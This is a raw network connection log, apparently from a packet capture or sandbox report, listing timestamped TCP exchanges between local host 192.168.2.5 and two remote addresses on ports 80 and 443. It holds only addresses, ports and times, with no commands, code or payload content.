Nov 13, 2024 20:39:25.780318975 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.780318975 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.780368090 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.783286095 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.783339977 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.783365011 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.783401012 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.783411026 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.783437014 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.783444881 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.783478975 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.783584118 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.783618927 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.783636093 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.783653021 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.783660889 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.783687115 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.783691883 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.783725977 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.783730984 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.783771992 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.784027100 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.784060955 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.784075975 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.784104109 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.784115076 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.784157991 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.784166098 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.784200907 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.784213066 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.784235001 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.784241915 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.784271955 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.784282923 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.784305096 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.784310102 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.784339905 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.784348011 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.784404993 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.784899950 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.784917116 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.784939051 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.784957886 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.814141989 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.814174891 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.814192057 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.814209938 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.814228058 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.814296007 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.814296007 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.814296007 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.814296007 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.814349890 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.814368963 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.814384937 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.814392090 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.814416885 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.814426899 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.814435005 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.814450979 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.814466953 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.814469099 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.814469099 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.814486980 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.814496040 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.814496040 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.814510107 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.814527988 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.814532042 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.814560890 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.814560890 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.815217972 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.815264940 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.815289021 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.815308094 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.815336943 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.815334082 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.815356970 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.815363884 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.815377951 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.815397024 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.815731049 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.815758944 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.815781116 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.815781116 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.815800905 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.815802097 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.815819979 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.815851927 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.815853119 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.815853119 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.855192900 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.855211973 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.855227947 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.855264902 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.855264902 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.855264902 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.896970987 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.897034883 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.897053957 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.897070885 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.897109032 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.897129059 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.897129059 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.897145987 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.897156000 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.897182941 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.897191048 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.897241116 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.900249958 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.900285006 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.900310993 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.900331974 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.900338888 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.900382996 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.900386095 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.900419950 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.900437117 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.900454998 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.900461912 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.900492907 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.900512934 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.900531054 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.900535107 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.900579929 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.900712967 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.900764942 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.900768042 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.900803089 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.900811911 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.900863886 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.900868893 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.900903940 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.900917053 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.900939941 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.900940895 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.900974035 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.900984049 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.901010036 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.901022911 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.901045084 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.901051998 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.901079893 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.901093960 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.901118040 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.901686907 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.901721954 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.901745081 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.901757956 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.901766062 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.901806116 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.908881903 CET	443	49735	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.909610987 CET	49735	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.909681082 CET	443	49735	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.909993887 CET	49735	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.910007954 CET	443	49735	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.917237043 CET	443	49736	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.918278933 CET	49736	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.918292046 CET	443	49736	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.918890953 CET	49736	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.918895006 CET	443	49736	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.931027889 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.931046009 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.931061983 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.931077003 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.931098938 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.931098938 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.931113005 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.931130886 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.931138992 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.931152105 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.931178093 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.931279898 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.931296110 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.931310892 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.931433916 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.931433916 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.931433916 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.931454897 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.931503057 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.931509972 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.931543112 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.931544065 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.931560040 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.931576014 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.931595087 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.931595087 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.931617022 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.931957006 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.932005882 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.932010889 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.932028055 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.932044029 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.932055950 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.932059050 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.932084084 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.932084084 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.932122946 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.932375908 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.932413101 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.932421923 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.932430029 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.932456017 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.932456017 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.932472944 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.932476997 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.932498932 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.932506084 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.932506084 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.932516098 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.932533979 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.932538986 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.932548046 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.932560921 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.932589054 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.932589054 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.964951038 CET	443	49738	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.965696096 CET	49738	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.965714931 CET	443	49738	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.966077089 CET	49738	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.966082096 CET	443	49738	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.972028017 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.972069025 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.972198963 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.972210884 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.972210884 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.972251892 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.972281933 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.972337008 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.007888079 CET	443	49737	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.008616924 CET	49737	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.008697033 CET	443	49737	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.008985996 CET	49737	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.009001017 CET	443	49737	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.013720989 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.013742924 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.013757944 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.013809919 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.013900042 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.013984919 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.014000893 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.014014959 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.014050961 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.014050961 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.017090082 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.017106056 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.017119884 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.017170906 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.017170906 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.017218113 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.017231941 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.017275095 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.017362118 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.017394066 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.017410994 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.017442942 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.017477036 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.017483950 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.017533064 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.017544031 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.017575026 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.017611027 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.017627001 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.017663956 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.017663956 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.017832041 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.017847061 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.017872095 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.017885923 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.017894983 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.017903090 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.017915010 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.017920017 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.017939091 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.017961979 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.018332005 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.018347979 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.018362999 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.018378973 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.018393993 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.018393993 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.018428087 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.270370960 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.270437956 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.270481110 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.270520926 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.270522118 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.270523071 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.270555973 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.270560026 CET	443	49735	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.270592928 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.270595074 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.270617962 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.270625114 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.270659924 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.270661116 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.270683050 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.270698071 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.270731926 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.270757914 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.270765066 CET	443	49735	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.270780087 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.270787954 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.270787001 CET	443	49736	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.270817995 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.270847082 CET	49735	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.270853043 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.270869970 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.270874023 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.270911932 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.270947933 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.270967960 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.270983934 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.270986080 CET	443	49736	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.271017075 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.271040916 CET	49736	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.271047115 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.271050930 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.271068096 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.271086931 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.271121979 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.271127939 CET	49735	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.271147013 CET	443	49735	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.271156073 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.271177053 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.271190882 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.271215916 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.271224976 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.271234989 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.271261930 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.271296978 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.271330118 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.271368027 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.271398067 CET	49736	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.271403074 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.271419048 CET	443	49736	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.271433115 CET	49736	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.271437883 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.271439075 CET	443	49736	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.271450996 CET	49720	80	192.168.2.5	185.215.113.206
